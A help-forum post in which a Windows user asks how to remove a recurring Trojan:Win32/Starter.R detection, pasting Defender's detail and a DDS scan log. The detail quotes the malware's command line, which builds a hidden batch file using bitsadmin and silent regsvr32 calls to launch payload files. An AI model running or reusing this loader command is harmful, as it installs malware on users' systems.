Trojan:Win32/Starter.R

This is a discussion on Trojan:Win32/Starter.R within the Virus/Trojan/Spyware Help forums, part of the Tech Support Forum category.


10-09-2018, 06:31 PM   #1
Registered Member
 
Join Date: Jun 2007
Location: Tulsa, Oklahoma
Posts: 36
OS: 10



Defender finds the threat Trojan:Win32/Starter.R about 3-4x a day. Each time I remove it, but a while later it hits on it again. I've also run Malwarebytes and removed it with it several times, but it still apparently shows back up. I've seen online when I was searching for info on it, several sites saying it can be easy to permanently remove BUT by using their program. I don't trust just every program that boasts being a legit virus remover. Needless to say I figured I'd come here ('cause I know to trust any program you may recommend, if needed).
Thank you for your time and assistance.

P.S. I don't think I have easy access to a Windows boot CD

THIS IS WHAT "DETAILS" DEFENDER GIVES EACH TIME IT NOTIFIES ME OF IT

Trojan:Win32/Starter.R
CmdLine: \Device\HarddiskVolume4\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo bitsadmin /complete 89331b0d-24f7-1 ^> nul >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo bitsadmin /cancel 89331b0d-24f7-1 ^> nul >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo if exist "C:\ProgramData\89331b0d-24f7-1\89331b0d-24f7-1.d" goto q >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\89331b0d-24f7-1\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=2c250bf689331b0c " "C:\ProgramData\89331b0d-24f7-1\%i" >> "C:\ProgramData\89331b0d-24f7-1\x.bat")) > nul & echo :q >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=2c250bf689331b0c " "C:\ProgramData\89331b0d-24f7-1\89331b0d-24f7-1.d" >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo del "C:\ProgramData\89331b0d-24f7-1\x.bat" ^& exit >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & "C:\ProgramData\89331b0d-24f7-1\x.bat""






DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.17134.1
Run by Christopher&Gabriell at 20:04:03 on 2018-10-09
Microsoft Windows 10 Home 10.0.17134.0.1252.1.1033.18.3554.1271 [GMT -5:00]
.
AV: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p
C:\WINDOWS\system32\fontdrvhost.exe
C:\WINDOWS\system32\svchost.exe -k RPCSS -p
C:\WINDOWS\system32\fontdrvhost.exe
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs -p
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p
C:\WINDOWS\system32\atiesrxx.exe
C:\WINDOWS\system32\atieclxx.exe
C:\WINDOWS\system32\svchost.exe -k LocalService -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Program Files\IDT\WDM\STacSV64.exe
C:\WINDOWS\system32\svchost.exe -k appmodel -p
C:\WINDOWS\System32\svchost.exe -k NetworkService -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\Hpservice.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\dashost.exe
C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
C:\WINDOWS\system32\svchost.exe -k apphost
C:\WINDOWS\System32\svchost.exe -k utcsvc -p
C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\WINDOWS\system32\taskhostw.exe
C:\Program Files\Core Temp\Core Temp.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe
C:\WINDOWS\system32\AUDIODG.EXE
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
C:\Windows\System32\CastSrv.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
C:\Program Files\Windows Defender\MSASCuiL.exe
C:\Program Files\IDT\WDM\sttray64.exe
C:\Program Files (x86)\Ruiware\WinPatrol\WinPatrol.exe
C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
C:\Windows\System32\SystemSettingsBroker.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\ApplicationFrameHost.exe
C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
C:\WINDOWS\system32\osk.exe
C:\Program Files\WindowsApps\Microsoft.WindowsStore_11809.1001.8.0_x64__8wekyb3d8bbwe\WinStore.App.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18081.14710.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
C:\WINDOWS\system32\SettingSyncHost.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera_crashreporter.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe
C:\WINDOWS\SysWOW64\DllHost.exe
C:\Program Files\Windows NT\Accessories\wordpad.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
C:\WINDOWS\system32\browser_broker.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\Windows.WARP.JITService.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Windows\System32\smartscreen.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
svchost.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
uLocal Page = %11%\blank.htm
BHO: HP Network Check Helper: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll
uRun: [WinPatrol] C:\Program Files (x86)\Ruiware\WinPatrol\winpatrol.exe
mRun: [HP CoolSense] C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe -byrunkey
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
mPolicies-System: DSCAutomationHostEnabled = dword:2
mPolicies-System: EnableFullTrustStartupTasks = dword:2
mPolicies-System: EnableUwpStartupTasks = dword:2
mPolicies-System: SupportFullTrustStartupTasks = dword:1
mPolicies-System: SupportUwpStartupTasks = dword:1
IE: E&xport to Microsoft Excel - C:\PROGRA~1\MICROS~1\Office16\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~1\MICROS~1\Office16\ONBttnIE.dll/105
IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office16\ONBttnIE.dll
IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} - hxxp://www.pcpitstop.com/nirvana/controls/pcmatic.cab
TCP: Interfaces\{982D5C35-5D95-44B3-84D9-0D16030AAD83} : DHCPNameServer = 68.105.28.11 68.105.29.11 68.105.28.12
Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSOXMLMF.DLL
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
SSODL: WebCheck - <orphaned>
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-Run: [SecurityHealth] C:\Program Files (x86)\Windows Defender\MSASCuiL.exe
x64-Run: [SynTPEnh] C:\Program Files (x86)\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [SysTrayApp] C:\Program Files\IDT\WDM\sttray64.exe
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-mPolicies-System: EnableFullTrustStartupTasks = dword:2
x64-mPolicies-System: EnableUwpStartupTasks = dword:2
x64-mPolicies-System: SupportFullTrustStartupTasks = dword:1
x64-mPolicies-System: SupportUwpStartupTasks = dword:1
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office16\ONBttnIE.dll
x64-IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\Office16\OCHelper.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSOXMLMF.DLL
x64-Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL
x64-Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\68.0.3440.106\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
============= SERVICES / DRIVERS ===============
.
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2018-4-11 177192]
R0 iorate;Disk I/O Rate Filter Driver;C:\WINDOWS\System32\drivers\iorate.sys [2018-4-11 58272]
R0 SgrmAgent;System Guard Runtime Monitor Agent;C:\WINDOWS\System32\drivers\SgrmAgent.sys [2018-4-11 63896]
R0 volume;Volume driver;C:\WINDOWS\System32\drivers\volume.sys [2018-4-11 16288]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2018-8-17 72768]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2018-4-11 18472]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2018-4-11 209816]
R1 afunix;afunix;C:\WINDOWS\System32\drivers\afunix.sys [2018-4-11 39424]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2018-4-11 254464]
R1 bam;Background Activity Moderator Driver;C:\WINDOWS\System32\drivers\bam.sys [2018-4-11 60320]
R1 CLVirtualDrive;CLVirtualDrive;C:\WINDOWS\System32\drivers\CLVirtualDrive.sys [2018-8-16 92536]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2018-4-11 55808]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2018-4-11 8192]
R2 AMD External Events Utility;AMD External Events Utility;C:\WINDOWS\System32\atiesrxx.exe [2014-9-15 257032]
R2 AMD FUEL Service;AMD FUEL Service;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [2014-9-15 344064]
R2 AODDriver4.3;AODDriver4.3;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys [2014-2-11 59616]
R2 APXACC;AppEx Networks Accelerator LWF;C:\WINDOWS\System32\drivers\appexDrv.sys [2018-9-20 228032]
R2 CDPSvc;Connected Devices Platform Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
R2 CldFlt;Windows Cloud Files Filter Driver;C:\WINDOWS\System32\drivers\cldflt.sys [2018-8-17 414720]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork -p [2018-4-11 51288]
R2 DiagTrack;Connected User Experiences and Telemetry;C:\WINDOWS\System32\svchost.exe -k utcsvc -p [2018-4-11 51288]
R2 DusmSvc;Data Usage;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R2 hpsrv;HP Service;C:\WINDOWS\System32\hpservice.exe [2012-9-24 31040]
R2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [2017-11-21 333688]
R2 HPWMISVC;HPWMISVC;C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe [2012-9-7 35232]
R2 IconMan_R;IconMan_R;C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [2018-9-21 2451456]
R2 SecurityHealthService;Windows Defender Security Center Service;C:\WINDOWS\System32\SecurityHealthService.exe [2018-8-17 760888]
R2 SgrmBroker;System Guard Runtime Monitor Broker;C:\WINDOWS\System32\SgrmBroker.exe [2018-4-11 163336]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2018-4-11 82432]
R2 SynTPEnhService;SynTPEnh Caller Service;C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [2016-4-28 253960]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R2 UsoSvc;Update Orchestrator Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R2 wcifs;Windows Container Isolation;C:\WINDOWS\System32\drivers\wcifs.sys [2018-4-11 151960]
R3 ALSysIO;ALSysIO;C:\Users\CHRIST~1\AppData\Local\Temp\ALSysIO64.sys [2018-8-20 46384]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\WINDOWS\System32\drivers\AtihdWT6.sys [2017-11-17 111112]
R3 CAD;Charge Arbitration Driver;C:\WINDOWS\System32\drivers\CAD.sys [2018-4-11 60320]
R3 camsvc;Capability Access Manager Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
R3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2018-4-11 20992]
R3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 RSP2STOR;Realtek PCIE CardReader Driver - P2;C:\WINDOWS\System32\drivers\RtsP2Stor.sys [2018-8-16 310528]
R3 rt640x64;Realtek RT640 NT Driver;C:\WINDOWS\System32\drivers\rt640x64.sys [2018-4-11 604160]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
R3 TimeBrokerSvc;Time Broker;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R3 TokenBroker;Web Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R3 usbfilter;AMD USB Filter Driver;C:\WINDOWS\System32\drivers\usbfilter.sys [2018-8-16 58536]
R3 WarpJITSvc;WarpJITSvc;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2018-4-11 51288]
R3 WdNisDrv;Windows Defender Antivirus Network Inspection System Driver;C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [2018-9-25 60584]
R3 WirelessButtonDriver64;HP Wireless Button Driver Service;C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [2018-5-11 34944]
S2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k NetworkService -p [2018-4-11 51288]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService -p [2018-4-11 51288]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2018-4-11 20480]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2018-4-11 1135520]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 amd_sata;amd_sata;C:\WINDOWS\System32\drivers\amd_sata.sys [2012-9-2 79528]
S3 amd_xata;amd_xata;C:\WINDOWS\System32\drivers\amd_xata.sys [2012-9-2 26280]
S3 amdkmafd;AMD Audio Bus Lower Filter;C:\WINDOWS\System32\drivers\amdkmafd.sys [2012-9-22 21160]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2018-4-11 18432]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness -p [2018-4-11 51288]
S3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx -p [2018-4-11 51288]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2018-4-11 9728]
S3 bindflt;Windows Bind Filter Driver;C:\WINDOWS\System32\drivers\bindflt.sys [2018-4-11 92056]
S3 BTAGService;Bluetooth Audio Gateway Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2018-4-11 51288]
S3 BthAvctpSvc;AVCTP service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 bttflt;Microsoft Hyper-V VHDPMEM BTT Filter;C:\WINDOWS\System32\drivers\bttflt.sys [2018-4-11 38304]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2018-4-11 39936]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2018-4-11 123392]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2018-4-11 321432]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2018-4-11 1836952]
S3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx -p [2018-4-11 51288]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2018-8-17 90624]
S3 diagsvc;Diagnostic Execution Service;C:\WINDOWS\System32\svchost.exe -k diagnostics [2018-4-11 51288]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 embeddedmode;Embedded Mode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
S3 FrameServer;Windows Camera Frame Server;C:\WINDOWS\System32\svchost.exe -k Camera [2018-4-11 51288]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2018-4-11 20992]
S3 GraphicsPerfSvc;GraphicsPerfSvc;C:\WINDOWS\System32\svchost.exe -k GraphicsPerfSvcGroup [2018-4-11 51288]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2018-4-11 50592]
S3 hpqcaslwmiex;HP CASL Framework Service;C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [2016-6-4 1031704]
S3 HvHost;HV Host Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 HwNClx0101;Microsoft Hardware Notifications Class Extension Driver;C:\WINDOWS\System32\drivers\mshwnclx.sys [2018-4-11 27136]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2018-4-11 36864]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2018-4-11 91648]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2018-4-11 79360]
S3 iaLPSS2i_GPIO2_BXT_P;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys [2018-4-11 88576]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2018-4-11 171520]
S3 iaLPSS2i_I2C_BXT_P;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C_BXT_P.sys [2018-4-11 174592]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2018-4-11 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2018-4-11 113152]
S3 iaStorA;iaStorA;C:\WINDOWS\System32\drivers\iaStorA.sys [2012-9-28 650808]
S3 iaStorAVC;Intel Chipset SATA RAID Controller;C:\WINDOWS\System32\drivers\iaStorAVC.sys [2018-4-11 885144]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2018-4-11 526232]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2018-4-11 38912]
S3 InstallService;Microsoft Store Install Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 IPT;IPT;C:\WINDOWS\System32\drivers\ipt.sys [2018-4-11 32256]
S3 IpxlatCfgSvc;IP Translation Configuration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 ItSas35i;ItSas35i;C:\WINDOWS\System32\drivers\ItSas35i.sys [2018-4-11 145816]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2018-4-11 124312]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2018-4-11 128408]
S3 LxpSvc;Language Experience Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2018-4-11 51288]
S3 mausbhost;MA-USB Host Controller Driver;C:\WINDOWS\System32\drivers\mausbhost.sys [2018-4-11 505240]
S3 mausbip;MA-USB IP Filter Driver;C:\WINDOWS\System32\drivers\mausbip.sys [2018-4-11 56736]
S3 MBAMService;Malwarebytes Service;C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [2018-8-29 6541008]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2018-4-11 75160]
S3 megasas35i;megasas35i;C:\WINDOWS\System32\drivers\megasas35i.sys [2018-4-11 82328]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2018-4-11 842648]
S3 NaturalAuthentication;Natural Authentication;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2018-4-11 108952]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library;C:\WINDOWS\System32\drivers\NetAdapterCx.sys [2018-4-11 175104]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 netvsc;netvsc;C:\WINDOWS\System32\drivers\netvsc.sys [2018-4-11 197632]
S3 nvdimm;Microsoft NVDIMM device driver;C:\WINDOWS\System32\drivers\nvdimm.sys [2018-4-11 104448]
S3 ose64;Office 64 Source Engine;C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE [2018-6-13 253640]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2018-4-11 58776]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2018-4-11 61848]
S3 PhoneSvc;Phone Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
